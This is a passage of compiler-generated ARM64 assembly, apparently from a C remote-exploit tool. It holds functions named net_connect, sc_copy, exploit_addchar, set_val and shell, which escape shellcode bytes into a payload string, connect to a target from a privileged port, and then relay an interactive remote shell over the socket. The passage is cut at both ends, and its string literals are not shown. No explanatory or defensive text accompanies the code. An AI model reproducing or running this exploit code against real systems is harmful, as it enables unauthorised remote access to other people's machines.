str x8, [x9]
adrp x1, l_.str.47@PAGE
add x1, x1, l_.str.47@PAGEOFF
bl _fprintf
ldr x8, [sp, #16] ; 8-byte Folded Reload
ldr x0, [x8]
adrp x1, l_.str.48@PAGE
add x1, x1, l_.str.48@PAGEOFF
bl _fprintf
ldr x8, [sp, #16] ; 8-byte Folded Reload
ldr x0, [x8]
mov x9, sp
mov x8, #10
str x8, [x9]
adrp x1, l_.str.49@PAGE
add x1, x1, l_.str.49@PAGEOFF
bl _fprintf
ldr x8, [sp, #16] ; 8-byte Folded Reload
ldr x0, [x8]
adrp x1, l_.str.50@PAGE
add x1, x1, l_.str.50@PAGEOFF
bl _fprintf
mov w0, #1
bl _exit
.cfi_endproc
; -- End function
.globl _net_connect ; -- Begin function net_connect
.p2align 2
_net_connect: ; @net_connect
.cfi_startproc
; %bb.0:
sub sp, sp, #320
.cfi_def_cfa_offset 320
stp x28, x27, [sp, #288] ; 16-byte Folded Spill
stp x29, x30, [sp, #304] ; 16-byte Folded Spill
add x29, sp, #304
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
adrp x8, ___darwin_check_fd_set_overflow@GOTPAGE
ldr x8, [x8, ___darwin_check_fd_set_overflow@GOTPAGEOFF]
subs x8, x8, #0
cset w8, eq
str w8, [sp, #44] ; 4-byte Folded Spill
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-24]
stur x0, [x29, #-88]
stur w1, [x29, #-92]
stur w2, [x29, #-96]
mov w0, #2
mov w1, #1
mov w2, #6
bl _socket
stur w0, [x29, #-100]
subs w8, w0, #0
cset w8, ge
tbnz w8, #0, LBB2_2
b LBB2_1
LBB2_1:
adrp x0, l_.str.36@PAGE
add x0, x0, l_.str.36@PAGEOFF
bl _perror
mov w0, #1
bl _exit
LBB2_2:
mov w8, #2
sturb w8, [x29, #-39]
stur wzr, [x29, #-36]
mov w8, #1023
stur w8, [x29, #-104]
b LBB2_3
LBB2_3: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-104]
subs w8, w8, #0
cset w8, le
tbnz w8, #0, LBB2_10
b LBB2_4
LBB2_4: ; in Loop: Header=BB2_3 Depth=1
b LBB2_5
LBB2_5: ; in Loop: Header=BB2_3 Depth=1
ldur w8, [x29, #-104]
and w0, w8, #0xffff
bl __OSSwapInt16
and w8, w0, #0xffff
str w8, [sp, #40] ; 4-byte Folded Spill
b LBB2_6
LBB2_6: ; in Loop: Header=BB2_3 Depth=1
ldr w8, [sp, #40] ; 4-byte Folded Reload
sub x1, x29, #40
sturh w8, [x29, #-38]
ldur w0, [x29, #-100]
mov w2, #16
bl _bind
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB2_8
b LBB2_7
LBB2_7:
b LBB2_10
LBB2_8: ; in Loop: Header=BB2_3 Depth=1
b LBB2_9
LBB2_9: ; in Loop: Header=BB2_3 Depth=1
ldur w8, [x29, #-104]
subs w8, w8, #1
stur w8, [x29, #-104]
b LBB2_3
LBB2_10:
ldur w8, [x29, #-104]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB2_12
b LBB2_11
LBB2_11:
ldur w2, [x29, #-100]
adrp x0, l_.str.6@PAGE
add x0, x0, l_.str.6@PAGEOFF
adrp x1, l_.str.37@PAGE
add x1, x1, l_.str.37@PAGEOFF
bl _fatalerr
b LBB2_12
LBB2_12:
b LBB2_13
LBB2_13:
ldur w8, [x29, #-92]
and w0, w8, #0xffff
bl __OSSwapInt16
and w8, w0, #0xffff
str w8, [sp, #36] ; 4-byte Folded Spill
b LBB2_14
LBB2_14:
ldr w8, [sp, #36] ; 4-byte Folded Reload
sturh w8, [x29, #-38]
ldur x0, [x29, #-88]
bl _net_resolve
stur w0, [x29, #-36]
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB2_16
b LBB2_15
LBB2_15:
ldur w2, [x29, #-100]
adrp x0, l_.str.6@PAGE
add x0, x0, l_.str.6@PAGEOFF
adrp x1, l_.str.38@PAGE
add x1, x1, l_.str.38@PAGEOFF
bl _fatalerr
b LBB2_16
LBB2_16:
ldur w0, [x29, #-100]
mov x8, sp
str xzr, [x8]
mov w1, #3
bl _fcntl
stur w0, [x29, #-108]
subs w8, w0, #0
cset w8, ge
tbnz w8, #0, LBB2_18
b LBB2_17
LBB2_17:
bl ___error
ldr w0, [x0]
bl _strerror
mov x1, x0
ldur w2, [x29, #-100]
adrp x0, l_.str.39@PAGE
add x0, x0, l_.str.39@PAGEOFF
bl _fatalerr
b LBB2_18
LBB2_18:
ldur w0, [x29, #-100]
ldur w8, [x29, #-108]
mov w1, #4
orr w10, w8, #0x4
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
bl _fcntl
subs w8, w0, #0
cset w8, ge
tbnz w8, #0, LBB2_20
b LBB2_19
LBB2_19:
bl ___error
ldr w0, [x0]
bl _strerror
mov x1, x0
ldur w2, [x29, #-100]
adrp x0, l_.str.39@PAGE
add x0, x0, l_.str.39@PAGEOFF
bl _fatalerr
b LBB2_20
LBB2_20:
ldur w0, [x29, #-100]
sub x1, x29, #40
mov w2, #16
bl _connect
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB2_24
b LBB2_21
LBB2_21:
ldur w0, [x29, #-100]
ldur w9, [x29, #-108]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
mov w1, #4
bl _fcntl
subs w8, w0, #0
cset w8, ge
tbnz w8, #0, LBB2_23
b LBB2_22
LBB2_22:
bl ___error
ldr w0, [x0]
bl _strerror
mov x1, x0
ldur w2, [x29, #-100]
adrp x0, l_.str.39@PAGE
add x0, x0, l_.str.39@PAGEOFF
bl _fatalerr
b LBB2_23
LBB2_23:
ldur w8, [x29, #-100]
stur w8, [x29, #-76]
b LBB2_38
LBB2_24:
bl ___error
ldr w8, [x0]
subs w8, w8, #36
cset w8, eq
tbnz w8, #0, LBB2_26
b LBB2_25
LBB2_25:
ldur w2, [x29, #-100]
adrp x0, l_.str.6@PAGE
add x0, x0, l_.str.6@PAGEOFF
adrp x1, l_.str.40@PAGE
add x1, x1, l_.str.40@PAGEOFF
bl _fatalerr
b LBB2_26
LBB2_26:
ldursw x8, [x29, #-96]
stur x8, [x29, #-128]
stur wzr, [x29, #-120]
add x0, sp, #48
str x0, [sp, #24] ; 8-byte Folded Spill
mov w1, #0
mov x2, #128
bl _memset
ldr x9, [sp, #24] ; 8-byte Folded Reload
ldr w8, [sp, #44] ; 4-byte Folded Reload
ldur w10, [x29, #-100]
stur w10, [x29, #-60]
stur x9, [x29, #-72]
ldur w10, [x29, #-60]
ldur x9, [x29, #-72]
stur w10, [x29, #-48]
stur x9, [x29, #-56]
tbnz w8, #0, LBB2_28
b LBB2_27
LBB2_27:
ldur w0, [x29, #-48]
ldur x1, [x29, #-56]
mov w2, #0
bl ___darwin_check_fd_set_overflow
stur w0, [x29, #-44]
b LBB2_29
LBB2_28:
mov w8, #1
stur w8, [x29, #-44]
b LBB2_29
LBB2_29:
ldur w8, [x29, #-44]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB2_31
b LBB2_30
LBB2_30:
ldursw x8, [x29, #-60]
mov x11, #32
udiv x9, x8, x11
mul x9, x9, x11
subs x9, x8, x9
mov x8, #1
lsl x8, x8, x9
mov x10, x8
ldur x8, [x29, #-72]
ldursw x9, [x29, #-60]
udiv x9, x9, x11
add x9, x8, x9, lsl #2
ldr w8, [x9]
orr w8, w8, w10
str w8, [x9]
b LBB2_31
LBB2_31:
mov w0, #1024
mov x3, #0
mov x1, x3
add x2, sp, #48
sub x4, x29, #128
bl _select
subs w8, w0, #0
cset w8, gt
tbnz w8, #0, LBB2_33
b LBB2_32
LBB2_32:
ldur w2, [x29, #-100]
adrp x0, l_.str.6@PAGE
add x0, x0, l_.str.6@PAGEOFF
adrp x1, l_.str.40@PAGE
add x1, x1, l_.str.40@PAGEOFF
bl _fatalerr
b LBB2_33
LBB2_33:
sub x2, x29, #112
mov w8, #16
stur w8, [x29, #-112]
ldur w0, [x29, #-100]
sub x1, x29, #40
bl _getpeername
subs w8, w0, #0
cset w8, ge
tbnz w8, #0, LBB2_35
b LBB2_34
LBB2_34:
ldur w2, [x29, #-100]
adrp x0, l_.str.6@PAGE
add x0, x0, l_.str.6@PAGEOFF
adrp x1, l_.str.40@PAGE
add x1, x1, l_.str.40@PAGEOFF
bl _fatalerr
b LBB2_35
LBB2_35:
ldur w0, [x29, #-100]
ldur w9, [x29, #-108]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
mov w1, #4
bl _fcntl
subs w8, w0, #0
cset w8, ge
tbnz w8, #0, LBB2_37
b LBB2_36
LBB2_36:
bl ___error
ldr w0, [x0]
bl _strerror
mov x1, x0
ldur w2, [x29, #-100]
adrp x0, l_.str.39@PAGE
add x0, x0, l_.str.39@PAGEOFF
bl _fatalerr
b LBB2_37
LBB2_37:
ldur w8, [x29, #-100]
stur w8, [x29, #-76]
b LBB2_38
LBB2_38:
ldur w8, [x29, #-76]
str w8, [sp, #20] ; 4-byte Folded Spill
ldur x9, [x29, #-24]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB2_40
b LBB2_39
LBB2_39:
bl ___stack_chk_fail
LBB2_40:
ldr w0, [sp, #20] ; 4-byte Folded Reload
ldp x29, x30, [sp, #304] ; 16-byte Folded Reload
ldp x28, x27, [sp, #288] ; 16-byte Folded Reload
add sp, sp, #320
ret
.cfi_endproc
; -- End function
.globl _fatalerr ; -- Begin function fatalerr
.p2align 2
_fatalerr: ; @fatalerr
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur x1, [x29, #-16]
stur w2, [x29, #-20]
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
ldr x0, [x8]
ldur x10, [x29, #-8]
ldur x8, [x29, #-16]
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x1, l_.str.35@PAGE
add x1, x1, l_.str.35@PAGEOFF
bl _fprintf
ldur w0, [x29, #-20]
bl _close
mov w0, #1
bl _exit
.cfi_endproc
; -- End function
.globl _net_read ; -- Begin function net_read
.p2align 2
_net_read: ; @net_read
.cfi_startproc
; %bb.0:
sub sp, sp, #304
.cfi_def_cfa_offset 304
stp x28, x27, [sp, #272] ; 16-byte Folded Spill
stp x29, x30, [sp, #288] ; 16-byte Folded Spill
add x29, sp, #288
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
sub x8, x29, #96
str x8, [sp, #24] ; 8-byte Folded Spill
adrp x9, ___darwin_check_fd_set_overflow@GOTPAGE
ldr x9, [x9, ___darwin_check_fd_set_overflow@GOTPAGEOFF]
subs x9, x9, #0
cset w9, ne
str w9, [sp, #32] ; 4-byte Folded Spill
stur w0, [x29, #-84]
str x1, [x8]
stur w2, [x29, #-100]
stur w3, [x29, #-104]
mov w9, #-1
str w9, [sp, #36]
ldursw x9, [x29, #-104]
str x9, [sp, #40]
mov w1, #0
str w1, [sp, #12] ; 4-byte Folded Spill
str wzr, [sp, #48]
ldr x0, [x8]
ldursw x2, [x29, #-100]
mov x3, #-1
bl ___memset_chk
ldr w1, [sp, #12] ; 4-byte Folded Reload
add x0, sp, #56
str x0, [sp, #16] ; 8-byte Folded Spill
mov x2, #128
bl _memset
ldr x9, [sp, #16] ; 8-byte Folded Reload
ldr x10, [sp, #24] ; 8-byte Folded Reload
ldr w8, [sp, #32] ; 4-byte Folded Reload
ldur w11, [x29, #-84]
stur w11, [x29, #-68]
str x9, [x10, #16]
ldur w11, [x29, #-68]
ldr x9, [x10, #16]
stur w11, [x29, #-24]
str x9, [x10, #64]
tbz w8, #0, LBB4_2
b LBB4_1
LBB4_1:
ldr x8, [sp, #24] ; 8-byte Folded Reload
ldur w0, [x29, #-24]
ldr x1, [x8, #64]
mov w2, #0
bl ___darwin_check_fd_set_overflow
stur w0, [x29, #-20]
b LBB4_3
LBB4_2:
mov w8, #1
stur w8, [x29, #-20]
b LBB4_3
LBB4_3:
ldur w8, [x29, #-20]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB4_5
b LBB4_4
LBB4_4:
ldr x8, [sp, #24] ; 8-byte Folded Reload
ldursw x9, [x29, #-68]
mov x11, #32
udiv x10, x9, x11
mul x10, x10, x11
subs x10, x9, x10
mov x9, #1
lsl x9, x9, x10
mov x10, x9
ldr x8, [x8, #16]
ldursw x9, [x29, #-68]
udiv x9, x9, x11
add x9, x8, x9, lsl #2
ldr w8, [x9]
orr w8, w8, w10
str w8, [x9]
b LBB4_5
LBB4_5:
mov w0, #1024
add x1, sp, #56
mov x3, #0
mov x2, x3
add x4, sp, #40
bl _select
subs w8, w0, #0
cset w8, ge
tbnz w8, #0, LBB4_7
b LBB4_6
LBB4_6:
adrp x0, l_.str.41@PAGE
add x0, x0, l_.str.41@PAGEOFF
bl _perror
mov w0, #1
bl _exit
LBB4_7:
ldr w8, [sp, #32] ; 4-byte Folded Reload
ldr x10, [sp, #24] ; 8-byte Folded Reload
ldur w9, [x29, #-84]
stur w9, [x29, #-56]
add x9, sp, #56
str x9, [x10, #32]
ldur w11, [x29, #-56]
ldr x9, [x10, #32]
stur w11, [x29, #-40]
str x9, [x10, #48]
tbz w8, #0, LBB4_9
b LBB4_8
LBB4_8:
ldr x8, [sp, #24] ; 8-byte Folded Reload
ldur w0, [x29, #-40]
ldr x1, [x8, #48]
mov w2, #0
bl ___darwin_check_fd_set_overflow
stur w0, [x29, #-36]
b LBB4_10
LBB4_9:
mov w8, #1
stur w8, [x29, #-36]
b LBB4_10
LBB4_10:
ldur w8, [x29, #-36]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB4_12
b LBB4_11
LBB4_11:
ldr x8, [sp, #24] ; 8-byte Folded Reload
ldr x8, [x8, #32]
ldursw x9, [x29, #-56]
mov x11, #32
udiv x9, x9, x11
ldr w8, [x8, x9, lsl #2]
ldursw x9, [x29, #-56]
udiv x10, x9, x11
mul x10, x10, x11
subs x10, x9, x10
mov x9, #1
lsl x9, x9, x10
; kill: def $w9 killed $w9 killed $x9
and w8, w8, w9
stur w8, [x29, #-52]
b LBB4_13
LBB4_12:
stur wzr, [x29, #-52]
b LBB4_13
LBB4_13:
ldur w8, [x29, #-52]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB4_15
b LBB4_14
LBB4_14:
ldr x8, [sp, #24] ; 8-byte Folded Reload
ldur w0, [x29, #-84]
ldr x1, [x8]
ldursw x2, [x29, #-100]
bl _read
mov x8, x0
str w8, [sp, #36]
b LBB4_15
LBB4_15:
ldr w0, [sp, #36]
ldp x29, x30, [sp, #288] ; 16-byte Folded Reload
ldp x28, x27, [sp, #272] ; 16-byte Folded Reload
add sp, sp, #304
ret
.cfi_endproc
; -- End function
.globl _set_val ; -- Begin function set_val
.p2align 2
_set_val: ; @set_val
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str x0, [sp, #8]
str w1, [sp, #4]
str w2, [sp]
ldr w8, [sp]
and w8, w8, #0xff000000
lsr w8, w8, #24
ldr x9, [sp, #8]
ldrsw x10, [sp, #4]
strb w8, [x9, x10]
ldr w8, [sp]
and w8, w8, #0xff0000
asr w8, w8, #16
ldr x9, [sp, #8]
ldr w10, [sp, #4]
add w10, w10, #1
strb w8, [x9, w10, sxtw]
ldr w8, [sp]
and w8, w8, #0xff00
asr w8, w8, #8
ldr x9, [sp, #8]
ldr w10, [sp, #4]
add w10, w10, #2
strb w8, [x9, w10, sxtw]
ldrb w8, [sp]
ldr x9, [sp, #8]
ldr w10, [sp, #4]
add w10, w10, #3
strb w8, [x9, w10, sxtw]
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.globl _sc_copy ; -- Begin function sc_copy
.p2align 2
_sc_copy: ; @sc_copy
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur x1, [x29, #-16]
str x2, [sp, #24]
ldur x8, [x29, #-8]
str x8, [sp, #16]
str wzr, [sp, #12]
b LBB6_1
LBB6_1: ; =>This Inner Loop Header: Depth=1
ldrsw x8, [sp, #12]
ldr x9, [sp, #24]
subs x8, x8, x9
cset w8, ge
tbnz w8, #0, LBB6_4
b LBB6_2
LBB6_2: ; in Loop: Header=BB6_1 Depth=1
ldur x0, [x29, #-8]
ldur x8, [x29, #-16]
ldrsw x9, [sp, #12]
ldrb w1, [x8, x9]
bl _exploit_addchar
ldur x8, [x29, #-8]
add x8, x8, w0, sxtw
stur x8, [x29, #-8]
b LBB6_3
LBB6_3: ; in Loop: Header=BB6_1 Depth=1
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB6_1
LBB6_4:
ldur x8, [x29, #-8]
ldr x9, [sp, #16]
subs x8, x8, x9
mov x0, x8
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.globl _shell ; -- Begin function shell
.p2align 2
_shell: ; @shell
.cfi_startproc
; %bb.0:
sub sp, sp, #448
.cfi_def_cfa_offset 448
stp x28, x27, [sp, #416] ; 16-byte Folded Spill
stp x29, x30, [sp, #432] ; 16-byte Folded Spill
add x29, sp, #432
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
adrp x8, ___darwin_check_fd_set_overflow@GOTPAGE
ldr x8, [x8, ___darwin_check_fd_set_overflow@GOTPAGEOFF]
subs x8, x8, #0
cset w8, ne
str w8, [sp, #20] ; 4-byte Folded Spill
stur w0, [x29, #-148]
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
ldr x0, [x8]
adrp x1, l_.str.42@PAGE
add x1, x1, l_.str.42@PAGEOFF
bl _fprintf
mov w0, #1
adrp x1, l_.str.33@PAGE
add x1, x1, l_.str.33@PAGEOFF
mov x2, #2
bl _write
ldur w0, [x29, #-148]
adrp x1, l_.str.43@PAGE
add x1, x1, l_.str.43@PAGEOFF
mov x2, #20
bl _write
b LBB7_1
LBB7_1: ; =>This Inner Loop Header: Depth=1
add x0, sp, #156
str x0, [sp, #8] ; 8-byte Folded Spill
mov w1, #0
mov x2, #128
bl _memset
ldr x9, [sp, #8] ; 8-byte Folded Reload
ldr w8, [sp, #20] ; 4-byte Folded Reload
ldur w10, [x29, #-148]
stur w10, [x29, #-116]
stur x9, [x29, #-128]
ldur w10, [x29, #-116]
ldur x9, [x29, #-128]
stur w10, [x29, #-40]
stur x9, [x29, #-48]
tbz w8, #0, LBB7_3
b LBB7_2
LBB7_2: ; in Loop: Header=BB7_1 Depth=1
ldur w0, [x29, #-40]
ldur x1, [x29, #-48]
mov w2, #0
bl ___darwin_check_fd_set_overflow
stur w0, [x29, #-36]
b LBB7_4
LBB7_3: ; in Loop: Header=BB7_1 Depth=1
mov w8, #1
stur w8, [x29, #-36]
b LBB7_4
LBB7_4: ; in Loop: Header=BB7_1 Depth=1
ldur w8, [x29, #-36]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB7_6
b LBB7_5
LBB7_5: ; in Loop: Header=BB7_1 Depth=1
ldursw x8, [x29, #-116]
mov x11, #32
udiv x9, x8, x11
mul x9, x9, x11
subs x9, x8, x9
mov x8, #1
lsl x8, x8, x9
mov x10, x8
ldur x8, [x29, #-128]
ldursw x9, [x29, #-116]
udiv x9, x9, x11
add x9, x8, x9, lsl #2
ldr w8, [x9]
orr w8, w8, w10
str w8, [x9]
b LBB7_6
LBB7_6: ; in Loop: Header=BB7_1 Depth=1
ldr w8, [sp, #20] ; 4-byte Folded Reload
stur wzr, [x29, #-132]
add x9, sp, #156
stur x9, [x29, #-144]
ldur w10, [x29, #-132]
ldur x9, [x29, #-144]
stur w10, [x29, #-24]
stur x9, [x29, #-32]
tbz w8, #0, LBB7_8
b LBB7_7
LBB7_7: ; in Loop: Header=BB7_1 Depth=1
ldur w0, [x29, #-24]
ldur x1, [x29, #-32]
mov w2, #0
bl ___darwin_check_fd_set_overflow
stur w0, [x29, #-20]
b LBB7_9
LBB7_8: ; in Loop: Header=BB7_1 Depth=1
mov w8, #1
stur w8, [x29, #-20]
b LBB7_9
LBB7_9: ; in Loop: Header=BB7_1 Depth=1
ldur w8, [x29, #-20]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB7_11
b LBB7_10
LBB7_10: ; in Loop: Header=BB7_1 Depth=1
ldursw x8, [x29, #-132]
mov x11, #32
udiv x9, x8, x11
mul x9, x9, x11
subs x9, x8, x9
mov x8, #1
lsl x8, x8, x9
mov x10, x8
ldur x8, [x29, #-144]
ldursw x9, [x29, #-132]
udiv x9, x9, x11
add x9, x8, x9, lsl #2
ldr w8, [x9]
orr w8, w8, w10
str w8, [x9]
b LBB7_11
LBB7_11: ; in Loop: Header=BB7_1 Depth=1
mov w0, #1024
add x1, sp, #156
mov x4, #0
mov x2, x4
mov x3, x4
bl _select
subs w8, w0, #0
cset w8, ge
tbnz w8, #0, LBB7_13
b LBB7_12
LBB7_12:
adrp x0, l_.str.41@PAGE
add x0, x0, l_.str.41@PAGEOFF
bl _perror
b LBB7_38
LBB7_13: ; in Loop: Header=BB7_1 Depth=1
ldr w8, [sp, #20] ; 4-byte Folded Reload
ldur w9, [x29, #-148]
stur w9, [x29, #-88]
add x9, sp, #156
stur x9, [x29, #-96]
ldur w10, [x29, #-88]
ldur x9, [x29, #-96]
stur w10, [x29, #-72]
stur x9, [x29, #-80]
tbz w8, #0, LBB7_15
b LBB7_14
LBB7_14: ; in Loop: Header=BB7_1 Depth=1
ldur w0, [x29, #-72]
ldur x1, [x29, #-80]
mov w2, #0
bl ___darwin_check_fd_set_overflow
stur w0, [x29, #-68]
b LBB7_16
LBB7_15: ; in Loop: Header=BB7_1 Depth=1
mov w8, #1
stur w8, [x29, #-68]
b LBB7_16
LBB7_16: ; in Loop: Header=BB7_1 Depth=1
ldur w8, [x29, #-68]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB7_18
b LBB7_17
LBB7_17: ; in Loop: Header=BB7_1 Depth=1
ldur x8, [x29, #-96]
ldursw x9, [x29, #-88]
mov x11, #32
udiv x9, x9, x11
ldr w8, [x8, x9, lsl #2]
ldursw x9, [x29, #-88]
udiv x10, x9, x11
mul x10, x10, x11
subs x10, x9, x10
mov x9, #1
lsl x9, x9, x10
; kill: def $w9 killed $w9 killed $x9
and w8, w8, w9
stur w8, [x29, #-84]
b LBB7_19
LBB7_18: ; in Loop: Header=BB7_1 Depth=1
stur wzr, [x29, #-84]
b LBB7_19
LBB7_19: ; in Loop: Header=BB7_1 Depth=1
ldur w8, [x29, #-84]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB7_25
b LBB7_20
LBB7_20: ; in Loop: Header=BB7_1 Depth=1
ldur w0, [x29, #-148]
add x1, sp, #28
mov x2, #128
bl _read
mov x8, x0
mov x9, x0
str w9, [sp, #24]
subs w8, w8, #0
cset w8, ge
tbnz w8, #0, LBB7_22
b LBB7_21
LBB7_21:
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
ldr x0, [x8]
adrp x1, l_.str.44@PAGE
add x1, x1, l_.str.44@PAGEOFF
bl _fprintf
b LBB7_38
LBB7_22: ; in Loop: Header=BB7_1 Depth=1
ldrsw x2, [sp, #24]
mov w0, #1
add x1, sp, #28
bl _write
subs x8, x0, #0
cset w8, ge
tbnz w8, #0, LBB7_24
b LBB7_23
LBB7_23:
adrp x0, l_.str.45@PAGE
add x0, x0, l_.str.45@PAGEOFF
bl _perror
b LBB7_38
LBB7_24: ; in Loop: Header=BB7_1 Depth=1
b LBB7_25
LBB7_25: ; in Loop: Header=BB7_1 Depth=1
ldr w8, [sp, #20] ; 4-byte Folded Reload
stur wzr, [x29, #-104]
add x9, sp, #156
stur x9, [x29, #-112]
ldur w10, [x29, #-104]
ldur x9, [x29, #-112]
stur w10, [x29, #-56]
stur x9, [x29, #-64]
tbz w8, #0, LBB7_27
b LBB7_26
LBB7_26: ; in Loop: Header=BB7_1 Depth=1
ldur w0, [x29, #-56]
ldur x1, [x29, #-64]
mov w2, #0
bl ___darwin_check_fd_set_overflow
stur w0, [x29, #-52]
b LBB7_28
LBB7_27: ; in Loop: Header=BB7_1 Depth=1
mov w8, #1
stur w8, [x29, #-52]
b LBB7_28
LBB7_28: ; in Loop: Header=BB7_1 Depth=1
ldur w8, [x29, #-52]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB7_30
b LBB7_29
LBB7_29: ; in Loop: Header=BB7_1 Depth=1
ldur x8, [x29, #-112]
ldursw x9, [x29, #-104]
mov x11, #32
udiv x9, x9, x11
ldr w8, [x8, x9, lsl #2]
ldursw x9, [x29, #-104]
udiv x10, x9, x11
mul x10, x10, x11
subs x10, x9, x10
mov x9, #1
lsl x9, x9, x10
; kill: def $w9 killed $w9 killed $x9
and w8, w8, w9
stur w8, [x29, #-100]
b LBB7_31
LBB7_30: ; in Loop: Header=BB7_1 Depth=1
stur wzr, [x29, #-100]
b LBB7_31
LBB7_31: ; in Loop: Header=BB7_1 Depth=1
ldur w8, [x29, #-100]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB7_37
b LBB7_32
LBB7_32: ; in Loop: Header=BB7_1 Depth=1
mov w0, #0
add x1, sp, #28
mov x2, #128
bl _read
mov x8, x0
mov x9, x0
str w9, [sp, #24]
subs w8, w8, #0
cset w8, ge
tbnz w8, #0, LBB7_34
b LBB7_33
LBB7_33:
adrp x0, l_.str.46@PAGE
add x0, x0, l_.str.46@PAGEOFF
bl _perror
b LBB7_38
LBB7_34: ; in Loop: Header=BB7_1 Depth=1
ldur w0, [x29, #-148]
ldrsw x2, [sp, #24]
add x1, sp, #28
bl _write
subs x8, x0, #0
cset w8, ge
tbnz w8, #0, LBB7_36
b LBB7_35
LBB7_35:
adrp x0, l_.str.45@PAGE
add x0, x0, l_.str.45@PAGEOFF
bl _perror
b LBB7_38
LBB7_36: ; in Loop: Header=BB7_1 Depth=1
b LBB7_37
LBB7_37: ; in Loop: Header=BB7_1 Depth=1
b LBB7_1
LBB7_38:
ldur w0, [x29, #-148]
bl _close
mov w0, #1
bl _exit
.cfi_endproc
; -- End function
.globl _exploit_addchar ; -- Begin function exploit_addchar
.p2align 2
_exploit_addchar: ; @exploit_addchar
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
str x0, [sp, #24]
strb w1, [sp, #23]
ldr x8, [sp, #24]
str x8, [sp, #8]
ldrb w8, [sp, #23]
str w8, [sp, #4] ; 4-byte Folded Spill
subs w8, w8, #9
subs w8, w8, #1
cset w8, ls
tbnz w8, #0, LBB8_5
b LBB8_1
LBB8_1:
ldr w8, [sp, #4] ; 4-byte Folded Reload
subs w8, w8, #32
cset w8, eq
tbnz w8, #0, LBB8_5
b LBB8_2
LBB8_2:
ldr w8, [sp, #4] ; 4-byte Folded Reload
subs w8, w8, #92
cset w8, eq
tbnz w8, #0, LBB8_4
b LBB8_3
LBB8_3:
ldr w8, [sp, #4] ; 4-byte Folded Reload
subs w8, w8, #255
cset w8, eq
tbnz w8, #0, LBB8_5
b LBB8_6
LBB8_4:
ldr x9, [sp, #24]
add x8, x9, #1
str x8, [sp, #24]
mov w8, #92
strb w8, [x9]
ldr x9, [sp, #24]
add x10, x9, #1
str x10, [sp, #24]
strb w8, [x9]
b LBB8_7
LBB8_5:
ldr x9, [sp, #24]
add x8, x9, #1
str x8, [sp, #24]
mov w8, #92
strb w8, [x9]
ldrb w8, [sp, #23]
and w8, w8, #0xc0
asr w8, w8, #6
add w8, w8, #48
ldr x9, [sp, #24]
add x10, x9, #1
str x10, [sp, #24]
strb w8, [x9]
ldrb w8, [sp, #23]
and w8, w8, #0x38
asr w8, w8, #3
add w8, w8, #48
ldr x9, [sp, #24]
add x10, x9, #1
str x10, [sp, #24]
strb w8, [x9]
ldrb w8, [sp, #23]
and w8, w8, #0x7
add w8, w8, #48
ldr x9, [sp, #24]
add x10, x9, #1
str x10, [sp, #24]
strb w8, [x9]
b LBB8_7
LBB8_6:
ldrb w8, [sp, #23]
ldr x9, [sp, #24]
add x10, x9, #1
str x10, [sp, #24]
strb w8, [x9]
b LBB8_7
LBB8_7:
ldr x8, [sp, #24]
ldr x9, [sp, #8]
subs x8, x8, x9
mov x0, x8
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function _OSSwapInt16
__OSSwapInt16: ; @_OSSwapInt16
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
strh w0, [sp, #14]
ldrh w9, [sp, #14]
ldrh w8, [sp, #14]
asr w8, w8, #8
orr w8, w8, w9, lsl #8
and w0, w8, #0xffff
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.globl _net_resolve ; -- Begin function net_resolve
